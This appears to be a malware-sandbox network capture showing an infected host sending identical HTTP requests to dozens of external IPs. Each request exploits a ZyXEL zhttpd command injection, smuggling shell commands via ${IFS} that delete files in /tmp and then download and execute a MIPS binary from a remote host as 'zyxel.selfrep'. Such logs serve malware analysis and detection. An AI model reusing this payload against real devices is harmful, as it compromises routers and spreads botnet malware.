                                        Mar 31, 2024 09:22:09.500037909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7023192.168.2.234512446.225.206.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.500087023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7024192.168.2.2352364118.113.184.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.500148058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7025192.168.2.2352140221.13.99.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.500193119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7026192.168.2.2359708188.99.5.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.500230074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7027192.168.2.2341308161.14.151.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.500322104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7028192.168.2.2354272119.45.143.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.500365019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7029192.168.2.2357548125.164.198.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.500415087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7030192.168.2.2338230200.168.127.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.500462055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7031192.168.2.2341372135.223.90.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.500530005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7032192.168.2.2346438150.152.175.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.500571012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7033192.168.2.234626450.194.49.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.500622988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7034192.168.2.234089893.230.161.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.500663042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7035192.168.2.2347378216.106.75.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.500756025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7036192.168.2.233881627.162.152.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.500790119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7037192.168.2.2346874161.73.43.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.500869989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7038192.168.2.2349540211.150.55.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.500902891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7039192.168.2.2347384223.136.134.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.500966072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7040192.168.2.2343740189.73.205.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.501003027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7041192.168.2.2345334204.91.36.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.501068115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7042192.168.2.2354916124.182.77.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.501117945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7043192.168.2.2333302194.155.172.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.501171112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7044192.168.2.2341108117.121.131.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.501210928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7045192.168.2.233459034.43.162.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.501280069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7046192.168.2.2342740203.147.14.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.501336098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7047192.168.2.2356376147.113.67.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.501377106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7048192.168.2.235808268.179.127.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.501441002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7049192.168.2.2356876186.165.11.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.501480103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7050192.168.2.23340042.219.106.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.501554012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7051192.168.2.2334862126.143.126.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.501596928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7052192.168.2.2339112218.203.69.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.501679897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7053192.168.2.235230232.65.133.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.501730919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7054192.168.2.2344120209.148.17.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.501775980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7055192.168.2.234644824.254.248.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.501821041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7056192.168.2.2348408135.241.12.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.501882076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7057192.168.2.234723693.57.45.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.501908064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7058192.168.2.2360588178.150.193.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.501944065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7059192.168.2.2335492131.120.41.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.501990080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7060192.168.2.234570819.136.89.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.502038002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7061192.168.2.233874881.88.225.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.502082109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7062192.168.2.233578225.29.80.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.502129078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7063192.168.2.2333184168.248.198.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.502171040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7064192.168.2.234289867.137.212.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.502218008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7065192.168.2.234607865.207.90.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.502259016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7066192.168.2.2359736208.128.156.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.502285957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7067192.168.2.235640097.117.106.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.502315044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7068192.168.2.234899624.30.197.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.502367973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7069192.168.2.2340032182.140.60.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.502415895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7070192.168.2.2352810133.20.40.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.502449989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7071192.168.2.2349100218.21.247.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.502504110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7072192.168.2.234994623.32.152.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.502557039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7073192.168.2.235665017.21.97.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.502593994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7074192.168.2.234332234.248.70.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.502660990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7075192.168.2.2343364146.56.151.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.502696991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7076192.168.2.233299844.81.185.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.502743959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7077192.168.2.2338344196.251.135.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.502793074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7078192.168.2.2346318134.84.251.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.502856970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7079192.168.2.235278894.123.127.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.502902985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7080192.168.2.2354546189.20.38.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.502948046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7081192.168.2.234626273.147.9.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.503002882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7082192.168.2.23483042.227.165.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.503056049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7083192.168.2.234489261.226.93.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.503093004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7084192.168.2.235123040.101.35.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.503149986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7085192.168.2.2355894158.80.135.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.503196955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7086192.168.2.2347272117.253.80.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.503246069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7087192.168.2.233413050.21.154.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.503276110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7088192.168.2.2339508208.80.112.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.503326893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7089192.168.2.2344796104.190.46.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.503350973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7090192.168.2.235282449.55.23.19443
                                        TimestampBytes transferredDirectionData
